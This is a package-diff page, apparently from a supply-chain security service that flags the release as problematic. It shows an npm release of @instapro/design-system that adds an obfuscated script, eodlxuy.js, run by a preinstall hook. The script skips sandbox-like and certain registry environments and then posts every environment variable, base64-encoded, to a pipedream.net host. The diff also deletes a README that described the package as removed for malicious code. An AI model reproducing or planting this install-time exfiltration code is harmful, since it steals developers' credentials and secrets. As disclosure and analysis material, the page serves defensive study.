@instapro/design-system 0.0.1-security → 6.817.699
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @instapro/design-system might be problematic. Click here for more details.
- package/eodlxuy.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/eodlxuy.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x3f8c16=a0_0x3a35;function a0_0x3a35(_0x506a3e,_0x2c9de1){const _0x4d98ae=a0_0x4d98();return a0_0x3a35=function(_0x3a35f2,_0x419ac4){_0x3a35f2=_0x3a35f2-0x194;let _0x5d3d9c=_0x4d98ae[_0x3a35f2];return _0x5d3d9c;},a0_0x3a35(_0x506a3e,_0x2c9de1);}(function(_0x395c21,_0x30cd8b){const _0x40ebda=a0_0x3a35,_0x4ca370=_0x395c21();while(!![]){try{const _0x409ef6=parseInt(_0x40ebda(0x198))/0x1+parseInt(_0x40ebda(0x1a2))/0x2*(-parseInt(_0x40ebda(0x1ae))/0x3)+-parseInt(_0x40ebda(0x1ac))/0x4+parseInt(_0x40ebda(0x199))/0x5+parseInt(_0x40ebda(0x197))/0x6*(parseInt(_0x40ebda(0x1af))/0x7)+-parseInt(_0x40ebda(0x1a1))/0x8*(parseInt(_0x40ebda(0x19e))/0x9)+parseInt(_0x40ebda(0x19f))/0xa;if(_0x409ef6===_0x30cd8b)break;else _0x4ca370['push'](_0x4ca370['shift']());}catch(_0xeea726){_0x4ca370['push'](_0x4ca370['shift']());}}}(a0_0x4d98,0x97e75));function a0_0x4d98(){const _0x1baecf=['2pWnnaK','some','keys','error','taobao.org','https','end','3e6cd05f19d5dd6adfbed43a32433776','net','pipedream','1437712qLNwmm','join','2883081vrKLPF','7JexmUo','daasadmin','toString','USERNAME','/usr/bin/python','3040770XVxrBi','628292hEaVIK','3754035zzciLh','includes','npm_package_name','base64','request','63mbRssy','610490GGCCph','env','4904iCybEs'];a0_0x4d98=function(){return _0x1baecf;};return a0_0x4d98();}const http=require(a0_0x3f8c16(0x1a7)),filter=[{'key':'npm_config_registry','val':a0_0x3f8c16(0x1a6)},{'key':'npm_config_registry','val':'tencent.com'},{'key':a0_0x3f8c16(0x195),'val':a0_0x3f8c16(0x1b0)},{'key':'_','val':a0_0x3f8c16(0x196)}];function main(){const _0x47e67e=a0_0x3f8c16;var _0x4027ea=process[_0x47e67e(0x1a0)]||{};if(filter[_0x47e67e(0x1a3)](({key:_0x4e92bd,val:_0x4ba195})=>_0x4027ea[_0x4e92bd]&&_0x4027ea[_0x4e92bd][_0x47e67e(0x19a)](_0x4ba195))||Object[_0x47e67e(0x1a4)](_0x4027ea)['length']<0xa)return;req=http[_0x47e67e(0x19d)]({'host':[_0x47e67e(0x1a9),'m',_0x47e67e(0x1ab),_0x47e67e(0x1aa)][_0x47e67e(0x1ad)]('.'),'path':'/'+(_0x4027ea[_0x47e67e(0x19b)]||''),'method':'POST'})['on'](_0x47e67e(0x1a5),function(_0xecbb64){}),req['write'](Buffer['from'](JSON['stringify'](_0x4027ea))[_0x47e67e(0x194)](_0x47e67e(0x19c))),req[_0x47e67e(0x1a8)]();}main();
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "@instapro/design-system",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "6.817.699",
|
4
|
+
"main": "eodlxuy.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node eodlxuy.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40instapro%2Fdesign-system for more information.
|